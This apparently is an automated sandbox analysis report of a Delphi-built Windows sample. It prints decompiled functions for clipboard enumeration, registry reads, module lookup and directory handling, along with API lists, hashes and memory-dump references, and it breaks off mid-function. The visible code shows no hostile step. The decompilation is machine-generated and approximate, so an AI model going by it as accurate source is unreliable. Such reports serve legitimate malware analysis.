                                                                                • Instruction ID: ce20360677368ed10bfa08b12ecf4a693c863dce037180e37b3076ca4ee65ff2
                                                                                • Opcode Fuzzy Hash: a24b23a3cf2ea92b505d84a07bd1098d24ab30b8c58cd20f8ff859496a66ffca
                                                                                • Instruction Fuzzy Hash: FEF01DF46001109BCA00FFAAD9C7D4B7BA8AF043097014466B909EF187C979E8654739
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409E74, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409E74(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;

				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L2:
					_t40 =  *0x487714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409E68(_t73);
					L4:
					E00408BA4( &_v273, 0x104, E0040AC1C(0x5c, _t89) + 1);
					_t74 = 0x409ff4;
					_t86 = 0x409ff4;
					_t83 =  *0x40771c; // 0x407768
					if(E00403740(_t87, _t83) != 0) {
						_t74 = E004047D0( *((intOrPtr*)(_t87 + 4)));
						_t69 = E00408B40(_t74, 0x409ff4);
						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
							_t86 = 0x409ff8;
						}
					}
					_t51 =  *0x486d9c; // 0x4074dc
					_t16 = _t51 + 4; // 0xffe7
					_t53 =  *0x487714; // 0x400000
					LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
					E00403504( *_t87,  &_v1116);
					_v860 =  &_v1116;
					_v856 = 4;
					_v852 =  &_v273;
					_v848 = 6;
					_v844 = _v12;
					_v840 = 5;
					_v836 = _t74;
					_v832 = 6;
					_v828 = _t86;
					_v824 = 6;
					E00409260(_v8,  &_v790, _a4, 4,  &_v860);
					return E00408B40(_v8, _t86);
				}
				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
				_t89 = _t72;
				if(_t72 != 0) {
					_t75 = _t73 - _v820.AllocationBase;
					__eflags = _t75;
					_v12 = _t75;
					goto L4;
				}
				goto L2;
			}
































                                                                                0x00409e80
                                                                                0x00409e83
                                                                                0x00409e85
                                                                                0x00409e91
                                                                                0x00409ea0
                                                                                0x00409ebe
                                                                                0x00409eca
                                                                                0x00409ed0
                                                                                0x00409edc
                                                                                0x00409eea
                                                                                0x00409f05
                                                                                0x00409f0a
                                                                                0x00409f0f
                                                                                0x00409f16
                                                                                0x00409f23
                                                                                0x00409f2d
                                                                                0x00409f31
                                                                                0x00409f38
                                                                                0x00409f41
                                                                                0x00409f41
                                                                                0x00409f38
                                                                                0x00409f52
                                                                                0x00409f57
                                                                                0x00409f5b
                                                                                0x00409f66
                                                                                0x00409f73
                                                                                0x00409f7e
                                                                                0x00409f84
                                                                                0x00409f91
                                                                                0x00409f97
                                                                                0x00409fa1
                                                                                0x00409fa7
                                                                                0x00409fae
                                                                                0x00409fb4
                                                                                0x00409fbb
                                                                                0x00409fc1
                                                                                0x00409fdd
                                                                                0x00409ff0
                                                                                0x00409ff0
                                                                                0x00409eb5
                                                                                0x00409eba
                                                                                0x00409ebc
                                                                                0x00409ee1
                                                                                0x00409ee1
                                                                                0x00409ee7
                                                                                0x00000000
                                                                                0x00409ee7
                                                                                0x00000000

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                • LoadStringA.USER32 ref: 00409F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID: hw@
                                                                                • API String ID: 3990497365-2938629419
                                                                                • Opcode ID: a90f6f03441cbaa7fa0682d0752cfab727030b6a8b25b319f2d74ba5cadffd5c
                                                                                • Instruction ID: 6dfe20bedbac6529fe5b7d32f625191ad228f2dd1b86655df6fb646d007f6676
                                                                                • Opcode Fuzzy Hash: a90f6f03441cbaa7fa0682d0752cfab727030b6a8b25b319f2d74ba5cadffd5c
                                                                                • Instruction Fuzzy Hash: 27412171A002589BDB21DB69CD85BDAB7BC9B08344F0044FAB548F7292D778AF84CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409E72, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409E72(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				long _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000) {
					L3:
					_t40 =  *0x487714; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00409E68(_t74);
				} else {
					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
					_t101 = _t72;
					if(_t72 != 0) {
						_t77 = _t74 - _v820.AllocationBase;
						__eflags = _t77;
						_v12 = _t77;
					} else {
						goto L3;
					}
				}
				E00408BA4( &_v273, 0x104, E0040AC1C(0x5c, _t101) + 1);
				_t75 = 0x409ff4;
				_t89 = 0x409ff4;
				_t85 =  *0x40771c; // 0x407768
				if(E00403740(_t92, _t85) != 0) {
					_t75 = E004047D0( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408B40(_t75, 0x409ff4);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x409ff8;
					}
				}
				_t51 =  *0x486d9c; // 0x4074dc
				_t16 = _t51 + 4; // 0xffe7
				_t53 =  *0x487714; // 0x400000
				LoadStringA(E00405A84(_t53),  *_t16,  &_v790, 0x100);
				E00403504( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00409260(_v8,  &_v790, _a4, 4,  &_v860);
				return E00408B40(_v8, _t89);
			}
































                                                                                0x00409e80
                                                                                0x00409e83
                                                                                0x00409e85
                                                                                0x00409e91
                                                                                0x00409ea0
                                                                                0x00409ebe
                                                                                0x00409eca
                                                                                0x00409ed0
                                                                                0x00409edc
                                                                                0x00409ea2
                                                                                0x00409eb5
                                                                                0x00409eba
                                                                                0x00409ebc
                                                                                0x00409ee1
                                                                                0x00409ee1
                                                                                0x00409ee7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409ebc
                                                                                0x00409f05
                                                                                0x00409f0a
                                                                                0x00409f0f
                                                                                0x00409f16
                                                                                0x00409f23
                                                                                0x00409f2d
                                                                                0x00409f31
                                                                                0x00409f38
                                                                                0x00409f41
                                                                                0x00409f41
                                                                                0x00409f38
                                                                                0x00409f52
                                                                                0x00409f57
                                                                                0x00409f5b
                                                                                0x00409f66
                                                                                0x00409f73
                                                                                0x00409f7e
                                                                                0x00409f84
                                                                                0x00409f91
                                                                                0x00409f97
                                                                                0x00409fa1
                                                                                0x00409fa7
                                                                                0x00409fae
                                                                                0x00409fb4
                                                                                0x00409fbb
                                                                                0x00409fc1
                                                                                0x00409fdd
                                                                                0x00409ff0

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409E91
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409EB5
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409ED0
                                                                                • LoadStringA.USER32 ref: 00409F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID: hw@
                                                                                • API String ID: 3990497365-2938629419
                                                                                • Opcode ID: 334110270a560beedd58625548b02213813cd1a699edec738f070ba869cd870d
                                                                                • Instruction ID: 0802fff38336e273a239bb27688692df7ffd8f152fb1f6293fdb009165743f52
                                                                                • Opcode Fuzzy Hash: 334110270a560beedd58625548b02213813cd1a699edec738f070ba869cd870d
                                                                                • Instruction Fuzzy Hash: E2412171A002589BDB21DB59CD85BDAB7BC9B08344F0044FAB548F7292D778AF848F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042EFF0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66clipboardCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E0042EFF0(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				void* __ecx;
				void* __ebp;
				void* _t16;
				void* _t20;
				void* _t24;
				void* _t25;
				signed short _t26;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t48;
				intOrPtr _t51;

				_t43 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
				_push(_t51);
				_push(0x42f092);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51;
				_t26 = EnumClipboardFormats(0);
				_t52 = _t26;
				if(_t26 == 0) {
					L4:
					_t29 =  *0x486a9c; // 0x41ce6c
					E0040A16C(_t29, 1);
					E00403D80();
					__eflags = 0;
					_pop(_t38);
					 *[fs:eax] = _t38;
					return  *((intOrPtr*)( *_v8 + 0x14))(0x42f099);
				} else {
					while(1) {
						_t16 = E00421B64(_t26, _t52);
						_t53 = _t16;
						if(_t16 != 0) {
							break;
						}
						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
						__eflags = _t26;
						if(__eflags != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					_t20 = GetClipboardData(_t26 & 0x0000ffff);
					E00421A74(_t43, _t20, _t26, _t53, GetClipboardData(9));
					_t24 = E00403E2C();
					return _t24;
				}
				L6:
			}



















                                                                                0x0042eff7
                                                                                0x0042eff9
                                                                                0x0042f001
                                                                                0x0042f006
                                                                                0x0042f007
                                                                                0x0042f00c
                                                                                0x0042f00f
                                                                                0x0042f019
                                                                                0x0042f01b
                                                                                0x0042f01e
                                                                                0x0042f065
                                                                                0x0042f065
                                                                                0x0042f072
                                                                                0x0042f077
                                                                                0x0042f07c
                                                                                0x0042f07e
                                                                                0x0042f081
                                                                                0x0042f091
                                                                                0x0042f020
                                                                                0x0042f020
                                                                                0x0042f027
                                                                                0x0042f02c
                                                                                0x0042f02e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042f05e
                                                                                0x0042f060
                                                                                0x0042f063
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0042f063
                                                                                0x0042f034
                                                                                0x0042f049
                                                                                0x0042f04e
                                                                                0x0042f09e
                                                                                0x0042f09e
                                                                                0x00000000

                                                                                APIs
                                                                                • EnumClipboardFormats.USER32(00000000,00000000,0042F092), ref: 0042F014
                                                                                • GetClipboardData.USER32 ref: 0042F034
                                                                                • GetClipboardData.USER32 ref: 0042F03D
                                                                                • EnumClipboardFormats.USER32(00000000,00000000,00000000,0042F092), ref: 0042F059
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Clipboard$DataEnumFormats
                                                                                • String ID: hw@
                                                                                • API String ID: 1256399260-2938629419
                                                                                • Opcode ID: f345650fdc8e6e35028b2a1f76c26e1abfcda7bc9bac7e31b1f0867aab6f8d0f
                                                                                • Instruction ID: d5f3744484d43ec70b7ebc33ac460ba0c135e77aa9ea613b6bd6e2d18685f22f
                                                                                • Opcode Fuzzy Hash: f345650fdc8e6e35028b2a1f76c26e1abfcda7bc9bac7e31b1f0867aab6f8d0f
                                                                                • Instruction Fuzzy Hash: 5011E371B042106FDB00EFB6E852A3BB7E9EFC9758790407BF504D7392D939AC0482A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040342C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E0040342C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x46b00c & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x46b00c; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x46b00c = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E0040349D);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4034a4);
					return RegCloseKey(_v8);
				}
			}












                                                                                0x0040342d
                                                                                0x0040342f
                                                                                0x00403439
                                                                                0x00403455
                                                                                0x004034a4
                                                                                0x004034b6
                                                                                0x004034b9
                                                                                0x004034c2
                                                                                0x00403457
                                                                                0x00403459
                                                                                0x0040345a
                                                                                0x0040345f
                                                                                0x00403462
                                                                                0x00403465
                                                                                0x00403481
                                                                                0x00403488
                                                                                0x0040348b
                                                                                0x0040348e
                                                                                0x0040349c
                                                                                0x0040349c

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040344E
                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403481
                                                                                • RegCloseKey.ADVAPI32(?,004034A4,00000000,?,00000004,00000000,0040349D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403497
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                • API String ID: 3677997916-4173385793
                                                                                • Opcode ID: 72dc0e7b57cfe8bfb1b047d5a70f687c94cba32d7e084e7188c53c41967f2b48
                                                                                • Instruction ID: 3309fe86c7077c7ed47a987fd5adbd923317a9070e71e01c00789b344bd26415
                                                                                • Opcode Fuzzy Hash: 72dc0e7b57cfe8bfb1b047d5a70f687c94cba32d7e084e7188c53c41967f2b48
                                                                                • Instruction Fuzzy Hash: 3601B575510708BAEB12DF91CD02BAABBACDB04B14F2040B6F914E66D0E6B85A10C76D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401A78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E00401A78() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401B2E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4875c4);
				L004013CC();
				if( *0x487049 != 0) {
					_push(0x4875c4);
					L004013D4();
				}
				E0040143C(0x4875e4);
				E0040143C(0x4875f4);
				E0040143C(0x487620);
				 *0x48761c = LocalAlloc(0, 0xff8);
				if( *0x48761c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x48761c; // 0x7528d0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x487608)) = 0x487604;
					 *0x487604 = 0x487604;
					 *0x487610 = 0x487604;
					 *0x4875bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B35);
				if( *0x487049 != 0) {
					_push(0x4875c4);
					L004013DC();
					return 0;
				}
				return 0;
			}







                                                                                0x00401a7d
                                                                                0x00401a7e
                                                                                0x00401a83
                                                                                0x00401a86
                                                                                0x00401a89
                                                                                0x00401a8e
                                                                                0x00401a9a
                                                                                0x00401a9c
                                                                                0x00401aa1
                                                                                0x00401aa1
                                                                                0x00401aab
                                                                                0x00401ab5
                                                                                0x00401abf
                                                                                0x00401ad0
                                                                                0x00401adc
                                                                                0x00401ade
                                                                                0x00401ae3
                                                                                0x00401ae3
                                                                                0x00401aeb
                                                                                0x00401aef
                                                                                0x00401af0
                                                                                0x00401afc
                                                                                0x00401aff
                                                                                0x00401b01
                                                                                0x00401b06
                                                                                0x00401b06
                                                                                0x00401b0f
                                                                                0x00401b12
                                                                                0x00401b15
                                                                                0x00401b21
                                                                                0x00401b23
                                                                                0x00401b28
                                                                                0x00000000
                                                                                0x00401b28
                                                                                0x00401b2d

                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,00401B35,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID: >u
                                                                                • API String ID: 730355536-2241530450
                                                                                • Opcode ID: 04eb5f13794330356172df4e0205cdafae50e2a33fa04e5506ec829306f9c8c4
                                                                                • Instruction ID: 8e578660cdcaf939112aab1382d748daa181a052473268aee4a8a104828a0e1f
                                                                                • Opcode Fuzzy Hash: 04eb5f13794330356172df4e0205cdafae50e2a33fa04e5506ec829306f9c8c4
                                                                                • Instruction Fuzzy Hash: D501A1B0A4C6416EE715BB6A9826B1D7AD0D745304F608C7FE000B6AF2D7BCC440CB2D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004028FC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004028FC(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404588(_t25, 0x105,  &_v532);
			}










                                                                                0x00402904
                                                                                0x00402906
                                                                                0x0040290a
                                                                                0x00402914
                                                                                0x00402917
                                                                                0x0040291c
                                                                                0x0040292e
                                                                                0x00402934
                                                                                0x00402934
                                                                                0x00402943
                                                                                0x0040294a
                                                                                0x00402954
                                                                                0x00402954
                                                                                0x00402971

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046552B), ref: 0040292E
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046552B), ref: 00402934
                                                                                • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046552B), ref: 00402943
                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046552B), ref: 00402954
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID: :
                                                                                • API String ID: 1611563598-336475711
                                                                                • Opcode ID: 1e77bd41e5d169101baf55dc96c7ba769223cc0188d789e3d9a54370b625b564
                                                                                • Instruction ID: e280489c4e77a9dbbac942a73009b5f8a6c13a22013b3f11ed9b453d4861a154
                                                                                • Opcode Fuzzy Hash: 1e77bd41e5d169101baf55dc96c7ba769223cc0188d789e3d9a54370b625b564
                                                                                • Instruction Fuzzy Hash: 9FF096763446C05AE310E6688852BDB72DC8B55344F04442EBBC8D73C2E6B8994857A7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045BDF8, Relevance: 7.8, APIs: 5, Instructions: 251COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E0045BDF8(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				long _v12;
				char _v16;
				signed int _v17;
				struct tagRECT _v33;
				struct tagRECT _v49;
				struct tagRECT _v65;
				void* __edi;
				void* __ebp;
				intOrPtr _t138;
				intOrPtr _t148;
				signed int _t163;
				signed int _t166;
				intOrPtr _t167;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				signed int _t188;
				intOrPtr _t201;
				intOrPtr _t202;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr* _t240;
				signed int _t252;
				intOrPtr _t253;
				intOrPtr _t256;
				signed int _t257;
				void* _t265;

				_v12 = __ecx;
				_v8 = __eax;
				_t240 = _a24 + 0xfffffffc;
				_v16 = __edx;
				_v49.top = _a20;
				while(1) {
					_t138 = _v49.top;
					if(_t138 >= _a12) {
						break;
					}
					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
					if(_t138 > _v16) {
						_t257 = _v8;
						_v49.left = _v12;
						_v49.bottom = E0045F800( *_t240, _v16) + _v49.top;
						while(1) {
							__eflags = _v49.left - _a16;
							if(_v49.left >= _a16) {
								break;
							}
							_t148 =  *_t240;
							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
								_v49.right = E0045F7E0( *_t240, _t257) + _v49.left;
								__eflags = _v49.right - _v49.left;
								if(_v49.right <= _v49.left) {
									L39:
									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
									_t257 = _t257 + 1;
									__eflags = _t257;
									continue;
								}
								__eflags = RectVisible(E0041FDC4( *((intOrPtr*)( *_t240 + 0x208))),  &_v49);
								if(__eflags == 0) {
									goto L39;
								} else {
									_v17 = _a4;
									_t163 = E0045B628( *_t240, __eflags);
									__eflags = _t163;
									if(_t163 != 0) {
										_t236 =  *_t240;
										__eflags =  *((intOrPtr*)(_t236 + 0x22c)) - _v16;
										if( *((intOrPtr*)(_t236 + 0x22c)) == _v16) {
											_t238 =  *_t240;
											__eflags = _t257 -  *((intOrPtr*)(_t238 + 0x228));
											if(_t257 ==  *((intOrPtr*)(_t238 + 0x228))) {
												_t24 =  &_v17;
												 *_t24 = _v17 | 0x00000002;
												__eflags =  *_t24;
											}
										}
									}
									_t242 = _a24 - 0x80;
									_t166 = E0045A35C(_t257, _a24 - 0x80, _v16);
									__eflags = _t166;
									if(_t166 != 0) {
										_t29 =  &_v17;
										 *_t29 = _v17 | 0x00000001;
										__eflags =  *_t29;
									}
									__eflags = _v17 & 0x00000002;
									if((_v17 & 0x00000002) == 0) {
										L14:
										_t167 =  *_t240;
										__eflags =  *((char*)(_t167 + 0x28c));
										if( *((char*)(_t167 + 0x28c)) != 0) {
